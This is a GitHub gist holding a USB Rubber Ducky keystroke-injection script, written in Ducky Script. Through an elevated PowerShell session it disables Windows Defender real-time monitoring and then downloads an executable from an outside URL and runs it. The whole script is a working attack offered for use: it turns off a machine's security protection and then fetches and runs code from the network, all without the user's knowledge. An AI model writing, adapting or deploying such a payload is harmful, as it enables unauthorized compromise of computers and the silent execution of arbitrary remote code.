Created
March 31, 2017 22:52
-
-
Save judge2020/48fdb58f2dea3fbb04a017e03c92d857 to your computer and use it in GitHub Desktop.
Ducky: turnoff windows defender, download and execute a file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Windows 10: Disable Windows Defender with Powershell | |
| REM Author: Judge2020 | |
| REM author website: Judge2020.com | |
| REM video: https://youtu.be/XQyB_bKjbgU | |
| REM | |
| REM let the HID enumerate | |
| DELAY 2000 | |
| GUI r | |
| DELAY 300 | |
| REM my best attempt at a elevated powershell instance | |
| STRING powershell Start-Process powershell -Verb runAs | |
| ENTER | |
| DELAY 2600 | |
| ALT y | |
| DELAY 500 | |
| REM turn off | |
| STRING Set-MpPreference -DisableRealtimeMonitoring $true | |
| ENTER | |
| REM | |
| REM | |
| REM | |
| REM config | |
| REM | |
| REM | |
| REM | |
| STRING $url = 'http://www.greyhathacker.net/tools/messbox.exe'; | |
| ENTER | |
| STRING $file = 'mess1.exe'; | |
| ENTER | |
| REM | |
| REM end config | |
| REM | |
| STRING $down = New-Object System.Net.WebClient; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; | |
| ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment